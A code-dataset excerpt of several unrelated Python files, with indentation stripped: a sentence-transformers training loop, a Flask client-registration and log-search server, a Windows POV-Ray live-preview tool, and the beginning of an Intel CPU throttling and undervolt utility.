labels = []
for example in batch:
for idx, text in enumerate(example.texts):
texts[idx].append(text)
labels.append(example.label)
labels = torch.tensor(labels).to(self._target_device)
sentence_features = []
for idx in range(num_texts):
tokenized = self.tokenize(texts[idx])
batch_to_device(tokenized, self._target_device)
sentence_features.append(tokenized)
return sentence_features, labels
def _text_length(self, text: Union[List[int], List[List[int]]]):
"""
Help function to get the length for the input text. Text can be either
a list of ints (which means a single text as input), or a tuple of list of ints
(representing several text inputs to the model).
"""
if isinstance(text, dict): #{key: value} case
return len(next(iter(text.values())))
elif not hasattr(text, '__len__'): #Object has no len() method
return 1
elif len(text) == 0 or isinstance(text[0], int): #Empty string or list of ints
return len(text)
else:
return sum([len(t) for t in text]) #Sum of length of individual strings
def fit(self,
train_objectives: Iterable[Tuple[DataLoader, nn.Module]],
evaluator: SentenceEvaluator = None,
epochs: int = 1,
steps_per_epoch = None,
scheduler: str = 'WarmupLinear',
warmup_steps: int = 10000,
optimizer_class: Type[Optimizer] = transformers.AdamW,
optimizer_params : Dict[str, object]= {'lr': 2e-5},
weight_decay: float = 0.01,
evaluation_steps: int = 0,
output_path: str = None,
save_best_model: bool = True,
max_grad_norm: float = 1,
use_amp: bool = False,
callback: Callable[[float, int, int], None] = None,
show_progress_bar: bool = True,
checkpoint_path: str = None,
checkpoint_save_steps: int = 500,
checkpoint_save_total_limit: int = 0
):
"""
Train the model with the given training objective
Each training objective is sampled in turn for one batch.
We sample only as many batches from each objective as there are in the smallest one
to make sure of equal training with each dataset.
:param train_objectives: Tuples of (DataLoader, LossFunction). Pass more than one for multi-task learning
:param evaluator: An evaluator (sentence_transformers.evaluation) evaluates the model performance during training on held-out dev data. It is used to determine the best model that is saved to disc.
:param epochs: Number of epochs for training
:param steps_per_epoch: Number of training steps per epoch. If set to None (default), one epoch is equal the DataLoader size from train_objectives.
:param scheduler: Learning rate scheduler. Available schedulers: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
:param warmup_steps: Behavior depends on the scheduler. For WarmupLinear (default), the learning rate is increased from o up to the maximal learning rate. After these many training steps, the learning rate is decreased linearly back to zero.
:param optimizer_class: Optimizer
:param optimizer_params: Optimizer parameters
:param weight_decay: Weight decay for model parameters
:param evaluation_steps: If > 0, evaluate the model using evaluator after each number of training steps
:param output_path: Storage path for the model and evaluation files
:param save_best_model: If true, the best model (according to evaluator) is stored at output_path
:param max_grad_norm: Used for gradient normalization.
:param use_amp: Use Automatic Mixed Precision (AMP). Only for Pytorch >= 1.6.0
:param callback: Callback function that is invoked after each evaluation.
It must accept the following three parameters in this order:
`score`, `epoch`, `steps`
:param show_progress_bar: If True, output a tqdm progress bar
:param checkpoint_path: Folder to save checkpoints during training
:param checkpoint_save_steps: Will save a checkpoint after so many steps
:param checkpoint_save_total_limit: Total number of checkpoints to store
"""
##Add info to model card
#info_loss_functions = "\n".join(["- {} with {} training examples".format(str(loss), len(dataloader)) for dataloader, loss in train_objectives])
info_loss_functions = []
for dataloader, loss in train_objectives:
info_loss_functions.extend(ModelCardTemplate.get_train_objective_info(dataloader, loss))
info_loss_functions = "\n\n".join([text for text in info_loss_functions])
info_fit_parameters = json.dumps({"evaluator": fullname(evaluator), "epochs": epochs, "steps_per_epoch": steps_per_epoch, "scheduler": scheduler, "warmup_steps": warmup_steps, "optimizer_class": str(optimizer_class), "optimizer_params": optimizer_params, "weight_decay": weight_decay, "evaluation_steps": evaluation_steps, "max_grad_norm": max_grad_norm }, indent=4, sort_keys=True)
self._model_card_text = None
self._model_card_vars['{TRAINING_SECTION}'] = ModelCardTemplate.__TRAINING_SECTION__.replace("{LOSS_FUNCTIONS}", info_loss_functions).replace("{FIT_PARAMETERS}", info_fit_parameters)
if use_amp:
from torch.cuda.amp import autocast
scaler = torch.cuda.amp.GradScaler()
self.to(self._target_device)
dataloaders = [dataloader for dataloader, _ in train_objectives]
# Use smart batching
for dataloader in dataloaders:
dataloader.collate_fn = self.smart_batching_collate
loss_models = [loss for _, loss in train_objectives]
for loss_model in loss_models:
loss_model.to(self._target_device)
self.best_score = -9999999
if steps_per_epoch is None or steps_per_epoch == 0:
steps_per_epoch = min([len(dataloader) for dataloader in dataloaders])
num_train_steps = int(steps_per_epoch * epochs)
# Prepare optimizers
optimizers = []
schedulers = []
for loss_model in loss_models:
param_optimizer = list(loss_model.named_parameters())
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': weight_decay},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
optimizer = optimizer_class(optimizer_grouped_parameters, **optimizer_params)
scheduler_obj = self._get_scheduler(optimizer, scheduler=scheduler, warmup_steps=warmup_steps, t_total=num_train_steps)
optimizers.append(optimizer)
schedulers.append(scheduler_obj)
global_step = 0
data_iterators = [iter(dataloader) for dataloader in dataloaders]
num_train_objectives = len(train_objectives)
skip_scheduler = False
for epoch in trange(epochs, desc="Epoch", disable=not show_progress_bar):
training_steps = 0
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
for _ in trange(steps_per_epoch, desc="Iteration", smoothing=0.05, disable=not show_progress_bar):
for train_idx in range(num_train_objectives):
loss_model = loss_models[train_idx]
optimizer = optimizers[train_idx]
scheduler = schedulers[train_idx]
data_iterator = data_iterators[train_idx]
try:
data = next(data_iterator)
except StopIteration:
data_iterator = iter(dataloaders[train_idx])
data_iterators[train_idx] = data_iterator
data = next(data_iterator)
features, labels = data
if use_amp:
with autocast():
loss_value = loss_model(features, labels)
scale_before_step = scaler.get_scale()
scaler.scale(loss_value).backward()
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
scaler.step(optimizer)
scaler.update()
skip_scheduler = scaler.get_scale() != scale_before_step
else:
loss_value = loss_model(features, labels)
loss_value.backward()
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
optimizer.step()
optimizer.zero_grad()
if not skip_scheduler:
scheduler.step()
training_steps += 1
global_step += 1
if evaluation_steps > 0 and training_steps % evaluation_steps == 0:
self._eval_during_training(evaluator, output_path, save_best_model, epoch, training_steps, callback)
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
if checkpoint_path is not None and checkpoint_save_steps is not None and checkpoint_save_steps > 0 and global_step % checkpoint_save_steps == 0:
self._save_checkpoint(checkpoint_path, checkpoint_save_total_limit, global_step)
self._eval_during_training(evaluator, output_path, save_best_model, epoch, -1, callback)
if evaluator is None and output_path is not None: #No evaluator, but output path: save final model version
self.save(output_path)
if checkpoint_path is not None:
self._save_checkpoint(checkpoint_path, checkpoint_save_total_limit, global_step)
def evaluate(self, evaluator: SentenceEvaluator, output_path: str = None):
"""
Evaluate the model
:param evaluator:
the evaluator
:param output_path:
the evaluator can write the results to this path
"""
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
return evaluator(self, output_path)
def _eval_during_training(self, evaluator, output_path, save_best_model, epoch, steps, callback):
"""Runs evaluation during the training"""
eval_path = output_path
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
eval_path = os.path.join(output_path, "eval")
os.makedirs(eval_path, exist_ok=True)
if evaluator is not None:
score = evaluator(self, output_path=eval_path, epoch=epoch, steps=steps)
if callback is not None:
callback(score, epoch, steps)
if score > self.best_score:
self.best_score = score
if save_best_model:
self.save(output_path)
def _save_checkpoint(self, checkpoint_path, checkpoint_save_total_limit, step):
# Store new checkpoint
self.save(os.path.join(checkpoint_path, str(step)))
# Delete old checkpoints
if checkpoint_save_total_limit is not None and checkpoint_save_total_limit > 0:
old_checkpoints = []
for subdir in os.listdir(checkpoint_path):
if subdir.isdigit():
old_checkpoints.append({'step': int(subdir), 'path': os.path.join(checkpoint_path, subdir)})
if len(old_checkpoints) > checkpoint_save_total_limit:
old_checkpoints = sorted(old_checkpoints, key=lambda x: x['step'])
shutil.rmtree(old_checkpoints[0]['path'])
def _load_auto_model(self, model_name_or_path):
"""
Creates a simple Transformer + Mean Pooling model and returns the modules
"""
logging.warning("No sentence-transformers model found with name {}. Creating a new one with MEAN pooling.".format(model_name_or_path))
transformer_model = Transformer(model_name_or_path)
pooling_model = Pooling(transformer_model.get_word_embedding_dimension(), 'mean')
return [transformer_model, pooling_model]
def _load_sbert_model(self, model_path):
"""
Loads a full sentence-transformers model
"""
# Check if the config_sentence_transformers.json file exists (exists since v2 of the framework)
config_sentence_transformers_json_path = os.path.join(model_path, 'config_sentence_transformers.json')
if os.path.exists(config_sentence_transformers_json_path):
with open(config_sentence_transformers_json_path) as fIn:
self._model_config = json.load(fIn)
if '__version__' in self._model_config and 'sentence_transformers' in self._model_config['__version__'] and self._model_config['__version__']['sentence_transformers'] > __version__:
logger.warning("You try to use a model that was created with version {}, however, your version is {}. This might cause unexpected behavior or errors. In that case, try to update to the latest version.\n\n\n".format(self._model_config['__version__']['sentence_transformers'], __version__))
# Check if a readme exists
model_card_path = os.path.join(model_path, 'README.md')
if os.path.exists(model_card_path):
try:
with open(model_card_path, encoding='utf8') as fIn:
self._model_card_text = fIn.read()
except:
pass
# Load the modules of sentence transformer
modules_json_path = os.path.join(model_path, 'modules.json')
with open(modules_json_path) as fIn:
modules_config = json.load(fIn)
modules = OrderedDict()
for module_config in modules_config:
module_class = import_from_string(module_config['type'])
module = module_class.load(os.path.join(model_path, module_config['path']))
modules[module_config['name']] = module
return modules
@staticmethod
def _get_scheduler(optimizer, scheduler: str, warmup_steps: int, t_total: int):
"""
Returns the correct learning rate scheduler. Available scheduler: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
"""
scheduler = scheduler.lower()
if scheduler == 'constantlr':
return transformers.get_constant_schedule(optimizer)
elif scheduler == 'warmupconstant':
return transformers.get_constant_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps)
elif scheduler == 'warmuplinear':
return transformers.get_linear_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosine':
return transformers.get_cosine_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosinewithhardrestarts':
return transformers.get_cosine_with_hard_restarts_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
else:
raise ValueError("Unknown scheduler {}".format(scheduler))
@property
def device(self) -> device:
"""
Get torch.device from module, assuming that the whole module has one device.
"""
try:
return next(self.parameters()).device
except StopIteration:
# For nn.DataParallel compatibility in PyTorch 1.5
def find_tensor_attributes(module: nn.Module) -> List[Tuple[str, Tensor]]:
tuples = [(k, v) for k, v in module.__dict__.items() if torch.is_tensor(v)]
return tuples
gen = self._named_members(get_members_fn=find_tensor_attributes)
first_tuple = next(gen)
return first_tuple[1].device
@property
def tokenizer(self):
"""
Property to get the tokenizer that is used by this model
"""
return self._first_module().tokenizer
@tokenizer.setter
def tokenizer(self, value):
"""
Property to set the tokenizer that is should used by this model
"""
self._first_module().tokenizer = value
@property
def max_seq_length(self):
"""
Property to get the maximal input sequence length for the model. Longer inputs will be truncated.
"""
return self._first_module().max_seq_length
@max_seq_length.setter
def max_seq_length(self, value):
"""
Property to set the maximal input sequence length for the model. Longer inputs will be truncated.
"""
self._first_module().max_seq_length = value
|
server.py | from flask import Flask, url_for
import logging
from logging.handlers import RotatingFileHandler
import sys
import requests
from contextlib import redirect_stderr
from flask import request
from flask import jsonify
import threading
import time
app = Flask(__name__)
runningPort = 5000
listOfClients = []
RETRY_COUNT = 5
def heartbeatTo(ipAddr, port):
time.sleep(5)
currTries = 0
while currTries < RETRY_COUNT:
try:
print("INFO: Attempting HB to " + ipAddr + ":" + str(port))
requests.head('http://' + ipAddr + ':' + str(port) + '/')
except requests.exceptions.RequestException as e:
print("WARN: Client " + ipAddr + ":" + str(port) + " failed to HB (" +
str(currTries) + ")")
currTries = currTries + 1
time.sleep(5)
continue
break
if currTries == RETRY_COUNT:
listOfClients.remove((ipAddr, port))
print("WARN: Client " + ipAddr + ":" + str(port) + " removed!")
threading.Timer(3, heartbeatTo, [ipAddr, port]).start()
@app.route('/register/<port>')
def register_client(port):
if (request.remote_addr, int(port)) not in listOfClients:
listOfClients.append((request.remote_addr, int(port)))
print("GET: Registered " + request.remote_addr + ":" + str(port))
t1 = threading.Thread(target = heartbeatTo, args = (request.remote_addr, int(port)))
t1.start()
return "Registered " + str(port)
else:
print("GET: Already registered " + request.remote_addr + ":" + str(port))
return "Already registered" + str(port)
@app.route('/registered')
def registered_clients():
return str(listOfClients)
@app.route('/log')
def give_log():
print("GET: Log")
data = ''
with open(str(runningPort)+'server.log', 'r') as myfile:
data=myfile.read().replace('\n', '</br>')
return data
@app.route('/search/<query>')
def search_log(query):
print("GET: Running log search...")
result = ''
for x in listOfClients:
logString = requests.get('http://'+str(x[0])+':'+str(x[1])+'/log').content
logArray = logString.decode("utf-8").split('</br>')
for y in logArray:
if query in y:
result = result + x[0] + ":" + str(x[1]) + " -> " + y + "\n"
return result
if __name__ == '__main__':
if len(sys.argv) is not 2:
print("INIT: Invalid args! Usage is: client.py [port]")
else:
print("INIT: Starting Server")
runningPort = int(sys.argv[1])
app.debug = True
app.logger.setLevel(logging.DEBUG)
with open(str(runningPort)+'server.log', 'w') as stderr, redirect_stderr(stderr):
app.run(host='localhost', port=runningPort, use_reloader=False)
|
main.py | import atexit
import ctypes
import ctypes.wintypes
import os
import subprocess
import sys
import tkinter
import time
import threading
from PIL import Image,ImageTk
BUFFER_SIZE=2048
IGNORE_TIME=0.05
RENDER_SIZE=(960,540)
ANIMATION_LENGTH=5
FILE_ACTION_MODIFIED=3
FILE_FLAG_BACKUP_SEMANTICS=0x2000000
FILE_FLAG_OVERLAPPED=0x40000000
FILE_LIST_DIRECTORY=1
FILE_NOTIFY_CHANGE_LAST_WRITE=0x10
FILE_NOTIFY_CHANGE_LAST_WRITE=0x10
FILE_SHARE_DELETE=0x4
FILE_SHARE_READ=0x1
FILE_SHARE_WRITE=0x2
INFINITE=0xffffffff
INVALID_HANDLE_VALUE=0xffffffffffffffff
MAX_PATH=260
OPEN_EXISTING=3
WAIT_OBJECT_0=0
ctypes.wintypes.ULONG_PTR=ctypes.POINTER(ctypes.wintypes.DWORD)
ctypes.wintypes.CONSOLE_SCREEN_BUFFER_INFO=type("CONSOLE_SCREEN_BUFFER_INFO",(ctypes.Structure,),{"_fields_":[("dwSize",ctypes.wintypes._COORD),("dwCursorPosition",ctypes.wintypes._COORD),("wAttributes",ctypes.wintypes.WORD),("srWindow",ctypes.wintypes.SMALL_RECT),("dwMaximumWindowSize",ctypes.wintypes._COORD)]})
ctypes.wintypes.FILE_NOTIFY_INFORMATION=type("FILE_NOTIFY_INFORMATION",(ctypes.Structure,),{"_fields_":[("NextEntryOffset",ctypes.wintypes.DWORD),("Action",ctypes.wintypes.DWORD),("FileNameLength",ctypes.wintypes.DWORD),("FileName",ctypes.wintypes.WCHAR*MAX_PATH)]})
ctypes.wintypes.OVERLAPPED_DUMMYUNIONNAME_DUMMYSTRUCTNAME=type("OVERLAPPED_DUMMYUNIONNAME_DUMMYSTRUCTNAME",(ctypes.Structure,),{"_fields_":[("Offset",ctypes.wintypes.DWORD),("OffsetHigh",ctypes.wintypes.DWORD)]})
ctypes.wintypes.OVERLAPPED_DUMMYUNIONNAME=type("OVERLAPPED_DUMMYUNIONNAME",(ctypes.Union,),{"_fields_":[("_0",ctypes.wintypes.OVERLAPPED_DUMMYUNIONNAME_DUMMYSTRUCTNAME),("Pointer",ctypes.wintypes.LPVOID)],"_anonymous_":["_0"]})
ctypes.wintypes.OVERLAPPED=type("OVERLAPPED",(ctypes.Structure,),{"_fields_":[("Internal",ctypes.wintypes.ULONG_PTR),("InternalHigh",ctypes.wintypes.ULONG_PTR),("_0",ctypes.wintypes.OVERLAPPED_DUMMYUNIONNAME),("hEvent",ctypes.wintypes.HANDLE)],"_anonymous_":["_0"]})
ctypes.wintypes.PCONSOLE_SCREEN_BUFFER_INFO=ctypes.POINTER(ctypes.wintypes.CONSOLE_SCREEN_BUFFER_INFO)
ctypes.wintypes.LPOVERLAPPED=ctypes.POINTER(ctypes.wintypes.OVERLAPPED)
ctypes.wintypes.LPOVERLAPPED_COMPLETION_ROUTINE=ctypes.c_void_p
ctypes.wintypes.LPSECURITY_ATTRIBUTES=ctypes.c_void_p
ctypes.windll.kernel32.CloseHandle.argtypes=(ctypes.wintypes.HANDLE,)
ctypes.windll.kernel32.CloseHandle.restype=ctypes.wintypes.BOOL
ctypes.windll.kernel32.CreateEventW.argtypes=(ctypes.wintypes.LPSECURITY_ATTRIBUTES,ctypes.wintypes.BOOL,ctypes.wintypes.BOOL,ctypes.wintypes.LPCWSTR)
ctypes.windll.kernel32.CreateEventW.restype=ctypes.wintypes.HANDLE
ctypes.windll.kernel32.CreateFileW.argtypes=(ctypes.wintypes.LPCWSTR,ctypes.wintypes.DWORD,ctypes.wintypes.DWORD,ctypes.wintypes.LPSECURITY_ATTRIBUTES,ctypes.wintypes.DWORD,ctypes.wintypes.DWORD,ctypes.wintypes.HANDLE)
ctypes.windll.kernel32.CreateFileW.restype=ctypes.wintypes.HANDLE
ctypes.windll.kernel32.FillConsoleOutputAttribute.argtypes=(ctypes.wintypes.HANDLE,ctypes.wintypes.WORD,ctypes.wintypes.DWORD,ctypes.wintypes._COORD,ctypes.wintypes.LPDWORD)
ctypes.windll.kernel32.FillConsoleOutputAttribute.restype=ctypes.wintypes.BOOL
ctypes.windll.kernel32.FillConsoleOutputCharacterA.argtypes=(ctypes.wintypes.HANDLE,ctypes.c_char,ctypes.wintypes.DWORD,ctypes.wintypes._COORD,ctypes.wintypes.LPDWORD)
ctypes.windll.kernel32.FillConsoleOutputCharacterA.restype=ctypes.wintypes.BOOL
ctypes.windll.kernel32.GetConsoleScreenBufferInfo.argtypes=(ctypes.wintypes.HANDLE,ctypes.wintypes.PCONSOLE_SCREEN_BUFFER_INFO)
ctypes.windll.kernel32.GetConsoleScreenBufferInfo.restype=ctypes.wintypes.BOOL
ctypes.windll.kernel32.GetStdHandle.argtypes=(ctypes.wintypes.DWORD,)
ctypes.windll.kernel32.GetStdHandle.restype=ctypes.wintypes.HANDLE
ctypes.windll.kernel32.ReadDirectoryChangesW.argtypes=(ctypes.wintypes.HANDLE,ctypes.wintypes.LPVOID,ctypes.wintypes.DWORD,ctypes.wintypes.BOOL,ctypes.wintypes.DWORD,ctypes.wintypes.LPDWORD,ctypes.wintypes.LPOVERLAPPED,ctypes.wintypes.LPOVERLAPPED_COMPLETION_ROUTINE)
ctypes.windll.kernel32.ReadDirectoryChangesW.restype=ctypes.wintypes.BOOL
ctypes.windll.kernel32.ResetEvent.argtypes=(ctypes.wintypes.HANDLE,)
ctypes.windll.kernel32.ResetEvent.restype=ctypes.wintypes.BOOL
ctypes.windll.kernel32.SetConsoleCursorPosition.argtypes=(ctypes.wintypes.HANDLE,ctypes.wintypes._COORD)
ctypes.windll.kernel32.SetConsoleCursorPosition.restype=ctypes.wintypes.BOOL
ctypes.windll.kernel32.WaitForSingleObject.argtypes=(ctypes.wintypes.HANDLE,ctypes.wintypes.DWORD)
ctypes.windll.kernel32.WaitForSingleObject.restype=ctypes.wintypes.DWORD
def run(fp):
def _render(td,fp):
def _run_r(td,fp):
ctypes.windll.kernel32.FillConsoleOutputCharacterA(ho,ctypes.c_char(b" "),sbi.dwSize.X*sbi.dwSize.Y,ctypes.wintypes._COORD(0,0),ctypes.byref(ctypes.wintypes.DWORD()))
ctypes.windll.kernel32.FillConsoleOutputAttribute(ho,7,sbi.dwSize.X*sbi.dwSize.Y,ctypes.wintypes._COORD(0,0),ctypes.byref(ctypes.wintypes.DWORD()))
ctypes.windll.kernel32.SetConsoleCursorPosition(ho,ctypes.wintypes._COORD(0,0))
dt=""
if (os.path.exists(f"{fp[:-3]}ini")):
with open(f"{fp[:-3]}ini","r") as f:
dt=f.read()
with open(f"{td}/__tmp.ini","w") as f:
f.write(f"{dt}\nLibrary_Path=bin/lib/include\nWidth={RENDER_SIZE[0]}\nHeight={RENDER_SIZE[1]}\nOutput_File_Name={td}/__out.png\nInput_File_Name={fp}\nOutput_To_File=true\nVerbose=false\nWarning_Console=false\nDebug_Console=false\nRender_Console=false\nStatistic_Console=false\n")
o=subprocess.run(["bin/pov.exe",f"{td}/__tmp.ini"],stdout=subprocess.PIPE,stderr=subprocess.STDOUT).stdout.strip().replace(b"\r\n",b"\n")[:-14]
if (os.path.exists(f"{td}/__out.png")):
r.geometry(f"{RENDER_SIZE[0]}x{RENDER_SIZE[1]}+{w-RENDER_SIZE[0]}+{h-RENDER_SIZE[1]}")
img=Image.open(f"{td}/__out.png")
r._tm=0
r._tm_idx=0
r._im_l=[ImageTk.PhotoImage(image=img)]
img.close()
os.remove(f"{td}/__out.png")
l=tuple(os.listdir(td))
if (len(l)>1):
r.geometry(f"{RENDER_SIZE[0]}x{RENDER_SIZE[1]}+{w-RENDER_SIZE[0]}+{h-RENDER_SIZE[1]}")
r._im_l.clear()
for k in l:
if (k[-4:]==".png"):
img=Image.open(f"{td}/{k}")
r._im_l.append(ImageTk.PhotoImage(image=img))
img.close()
os.remove(f"{td}/{k}")
r._tm=0
r._tm_idx=0
else:
r.geometry(f"{RENDER_SIZE[0]}x{RENDER_SIZE[1]}+{w}+{h}")
sys.__stdout__.write(str(o,"utf-8"))
thr=threading.Thread(target=_run_r,args=(td,fp),kwargs={})
thr.daemon=True
thr.start()
def _read_dc(fp):
fp=os.path.abspath(fp)
d="/".join(fp.replace("\\","/").split("/")[:-1])
f=fp[len(d)+1:]
td=os.path.abspath((os.getenv("TEMP") if os.getenv("TEMP") else os.getenv("TMP"))).replace("\\","/").strip("/")+"/__povray_cli_data"
if (not os.path.exists(td)):
os.mkdir(td)
_render(td,fp)
dh=ctypes.windll.kernel32.CreateFileW(d,FILE_LIST_DIRECTORY,FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE,0,OPEN_EXISTING,FILE_FLAG_BACKUP_SEMANTICS|FILE_FLAG_OVERLAPPED,0)
if (dh!=INVALID_HANDLE_VALUE):
atexit.register(lambda:ctypes.windll.kernel32.CloseHandle(dh))
bf=ctypes.create_string_buffer(BUFFER_SIZE)
ov=ctypes.wintypes.OVERLAPPED()
ov.hEvent=ctypes.windll.kernel32.CreateEventW(0,True,False,None)
ig_tm=0
dt=ctypes.wintypes.FILE_NOTIFY_INFORMATION()
while (True):
ctypes.windll.kernel32.ReadDirectoryChangesW(dh,bf,BUFFER_SIZE,False,FILE_NOTIFY_CHANGE_LAST_WRITE,ctypes.byref(ctypes.wintypes.DWORD()),ctypes.byref(ov),0)
if (ctypes.windll.kernel32.WaitForSingleObject(ov.hEvent,INFINITE)==WAIT_OBJECT_0):
ctypes.windll.kernel32.ResetEvent(ov.hEvent)
if (ig_tm>time.time()):
continue
ig_tm=time.time()+IGNORE_TIME
i=0
while (True):
ctypes.memmove(ctypes.addressof(dt),bf[i:],min(ctypes.sizeof(dt),len(bf)-i))
if (dt.Action==FILE_ACTION_MODIFIED and dt.FileName[:dt.FileNameLength//ctypes.sizeof(ctypes.wintypes.WCHAR)]==f):
_render(td,fp)
if (dt.NextEntryOffset==0):
break
else:
i=dt.NextEntryOffset
def _render_loop():
ct=time.time()
if (r._tm<=ct and len(r._im_l)>0):
r._tm=ct+ANIMATION_LENGTH/len(r._im_l)
c.delete(tkinter.ALL)
c.create_image(0,0,image=r._im_l[r._tm_idx],anchor=tkinter.NW)
r._tm_idx=(r._tm_idx+1)%len(r._im_l)
r.after(1000//60,_render_loop)
ctypes.windll.user32.SetProcessDPIAware()
sbi=ctypes.wintypes.CONSOLE_SCREEN_BUFFER_INFO()
ho=ctypes.windll.kernel32.GetStdHandle(-11)
ctypes.windll.kernel32.GetConsoleScreenBufferInfo(ho,ctypes.byref(sbi))
ctypes.windll.kernel32.FillConsoleOutputCharacterA(ho,ctypes.c_char(b" "),sbi.dwSize.X*sbi.dwSize.Y,ctypes.wintypes._COORD(0,0),ctypes.byref(ctypes.wintypes.DWORD()))
ctypes.windll.kernel32.FillConsoleOutputAttribute(ho,7,sbi.dwSize.X*sbi.dwSize.Y,ctypes.wintypes._COORD(0,0),ctypes.byref(ctypes.wintypes.DWORD()))
ctypes.windll.kernel32.SetConsoleCursorPosition(ho,ctypes.wintypes._COORD(0,0))
thr=threading.Thread(target=_read_dc,args=(fp,),kwargs={})
thr.daemon=True
thr.start()
r=tkinter.Tk()
r.attributes("-topmost",True)
r.resizable(False,False)
r.overrideredirect(True)
r.bind("<Escape>",lambda _:r.destroy())
w=r.winfo_screenwidth()
h=r.winfo_screenheight()
r.geometry(f"{RENDER_SIZE[0]}x{RENDER_SIZE[1]}+{w}+{h}")
c=tkinter.Canvas(r,width=RENDER_SIZE[0],height=RENDER_SIZE[1],highlightthickness=0,background="#000000",cursor="tcross")
c.pack()
r.update_idletasks()
r._tm=0
r._tm_idx=0
r._im_l=[]
r.after(1000//60,_render_loop)
r.mainloop()
run(sys.argv[1])
|
throttled.py | #!/usr/bin/env python3
from __future__ import print_function
import argparse
import configparser
import glob
import gzip
import os
import re
import struct
import subprocess
import sys
from collections import defaultdict
from datetime import datetime
from errno import EACCES, EIO, EPERM
from multiprocessing import cpu_count
from platform import uname
from threading import Event, Thread
from time import time
import dbus
from dbus.mainloop.glib import DBusGMainLoop
from gi.repository import GLib
from mmio import MMIO, MMIOError
DEFAULT_SYSFS_POWER_PATH = '/sys/class/power_supply/AC*/online'
VOLTAGE_PLANES = {'CORE': 0, 'GPU': 1, 'CACHE': 2, 'UNCORE': 3, 'ANALOGIO': 4}
CURRENT_PLANES = {'CORE': 0, 'GPU': 1, 'CACHE': 2}
TRIP_TEMP_RANGE = [40, 97]
UNDERVOLT_KEYS = ('UNDERVOLT', 'UNDERVOLT.AC', 'UNDERVOLT.BATTERY')
ICCMAX_KEYS = ('ICCMAX', 'ICCMAX.AC', 'ICCMAX.BATTERY')
power = {'source': None, 'method': 'polling'}
MSR_DICT = {
'MSR_PLATFORM_INFO': 0xCE,
'MSR_OC_MAILBOX': 0x150,
'IA32_PERF_STATUS': 0x198,
'IA32_THERM_STATUS': 0x19C,
'MSR_TEMPERATURE_TARGET': 0x1A2,
'MSR_POWER_CTL': 0x1FC,
'MSR_RAPL_POWER_UNIT': 0x606,
'MSR_PKG_POWER_LIMIT': 0x610,
'MSR_INTEL_PKG_ENERGY_STATUS': 0x611,
'MSR_DRAM_ENERGY_STATUS': 0x619,
'MSR_PP1_ENERGY_STATUS': 0x641,
'MSR_CONFIG_TDP_CONTROL': 0x64B,
'IA32_HWP_REQUEST': 0x774,
}
HWP_PERFORMANCE_VALUE = 0x20
HWP_DEFAULT_VALUE = 0x80
HWP_INTERVAL = 60
platform_info_bits = {
'maximum_non_turbo_ratio': [8, 15],
'maximum_efficiency_ratio': [40, 47],
'minimum_operating_ratio': [48, 55],
'feature_ppin_cap': [23, 23],
'feature_programmable_turbo_ratio': [28, 28],
'feature_programmable_tdp_limit': [29, 29],
'number_of_additional_tdp_profiles': [33, 34],
'feature_programmable_temperature_target': [30, 30],
'feature_low_power_mode': [32, 32],
}
thermal_status_bits = {
'thermal_limit_status': [0, 0],
'thermal_limit_log': [1, 1],
'prochot_or_forcepr_status': [2, 2],
'prochot_or_forcepr_log': [3, 3],
'crit_temp_status': [4, 4],
'crit_temp_log': [5, 5],
'thermal_threshold1_status': [6, 6],
'thermal_threshold1_log': [7, 7],
'thermal_threshold2_status': [8, 8],
'thermal_threshold2_log': [9, 9],
'power_limit_status': [10, 10],
'power_limit_log': [11, 11],
'current_limit_status': [12, 12],
'current_limit_log': [13, 13],
'cross_domain_limit_status': [14, 14],
'cross_domain_limit_log': [15, 15],
'cpu_temp': [16, 22],
'temp_resolution': [27, 30],
'reading_valid': [31, 31],
}
supported_cpus = {
(6, 26, 1): 'Nehalem',
(6, 26, 2): 'Nehalem-EP',
(6, 26, 4): 'Bloomfield',
(6, 28, 2): 'Silverthorne',
(6, 28, 10): 'PineView',
(6, 29, 0): 'Dunnington-6C',
(6, 29, 1): 'Dunnington',
(6, 30, 0): 'Lynnfield',
(6, 30, 5): 'Lynnfield_CPUID',
(6, 31, 1): 'Auburndale',
(6, 37, 2): 'Clarkdale',
(6, 38, 1): 'TunnelCreek',
(6, 39, 2): 'Medfield',
(6, 42, 2): 'SandyBridge',
(6, 42, 6): 'SandyBridge',
(6, 42, 7): 'Sandy Bridge-DT',
(6, 44, 1): 'Westmere-EP',
(6, 44, 2): 'Gulftown',
(6, 45, 5): 'Sandy Bridge-EP',
(6, 45, 6): 'Sandy Bridge-E',
(6, 46, 4): 'Beckton',
(6, 46, 5): 'Beckton',
(6, 46, 6): 'Beckton',
(6, 47, 2): 'Eagleton',
(6, 53, 1): 'Cloverview',
(6, 54, 1): 'Cedarview-D',
(6, 54, 9): 'Centerton',
(6, 55, 3): 'Bay Trail-D',
(6, 55, 8): 'Silvermont',
(6, 58, 9): 'Ivy Bridge-DT',
(6, 60, 3): 'Haswell-DT',
(6, 61, 4): 'Broadwell-U',
(6, 62, 3): 'IvyBridgeEP',
(6, 62, 4): 'Ivy Bridge-E',
(6, 63, 2): 'Haswell-EP',
(6, 69, 1): 'HaswellULT',
(6, 70, 1): 'Crystal Well-DT',
(6, 71, 1): 'Broadwell-H',
(6, 76, 3): 'Braswell',
(6, 77, 8): 'Avoton',
(6, 78, 3): 'Skylake',
(6, 79, 1): 'BroadwellE',
(6, 85, 4): 'SkylakeXeon',
(6, 85, 6): 'CascadeLakeSP',
(6, 85, 7): 'CascadeLakeXeon2',
